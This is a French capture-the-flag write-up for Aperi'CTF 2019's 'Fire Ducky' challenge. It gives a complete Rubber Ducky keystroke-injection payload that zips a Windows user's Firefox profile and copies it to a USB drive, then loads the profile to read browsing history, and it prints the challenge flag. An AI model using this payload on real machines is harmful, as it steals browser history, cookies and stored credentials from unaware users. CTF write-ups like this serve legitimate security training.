Aperi’CTF 2019 - Fire Ducky
Détails du challenge
| Event | Challenge | Category | Points | Solves |
|---|---|---|---|---|
| Aperi’CTF 2019 | Fire Ducky | Physique | 175 | ??? |
L’utilisateur du PC ducky semble avoir une activité suspecte sur son navigateur. Investiguez. L’exfiltration des données peut se faire à l’aide d’une clé USB classique (montage D:// par default) uniquement. Le flag respecte le format APRK{…}.
TL;DR
Dump du profil Mozilla FireFox avec le Rubber Ducky et 7z :
7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles
Méthodologie
D’après le nom du challenge, le navigateur devrait être FireFox. Pour mener l’investigation, nous allons dumper le profil Firefox. Par défaut, le profil FireFox se situe à l’emplacement suivant : %AppData%\Mozilla\Firefox\Profiles.
Étant donné que les profils FireFox sont des dossiers, nous allons utiliser la commande 7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles pour créer un fichier zip du dossier contenant les profils. Nous allons créer le fichier d’archive dans %Temp% puis le déplacer vers D:\\.
Voici le payload ducky final (notez la pause due à la compression zip) :
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING cd %Temp%
ENTER
DELAY 1000
STRING 7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles
ENTER
DELAY 30000
STRING xcopy "mysecretprofile.zip" "D:\"
ENTER
Ensuite, nous débranchons les deux clés et investiguons sur mysecretprofile.zip. Pour cela, j’ai décidé de charger le profil. Collez le dossier v0t6ebj3.default-release dans votre dossier de profils (sur debian : ~/.mozilla/firefox). Fermez ensuite Firefox, éditez profiles.ini (conservez une copie du fichier profiles.ini original) :
[Profile0]
Name=Ducky
IsRelative=1
Path=v0t6ebj3.default-release
Default=1
Lancez Firefox :

Regardez ensuite l’historique :

Flag
APRK{Rubb3r_C0o0o0oK!E}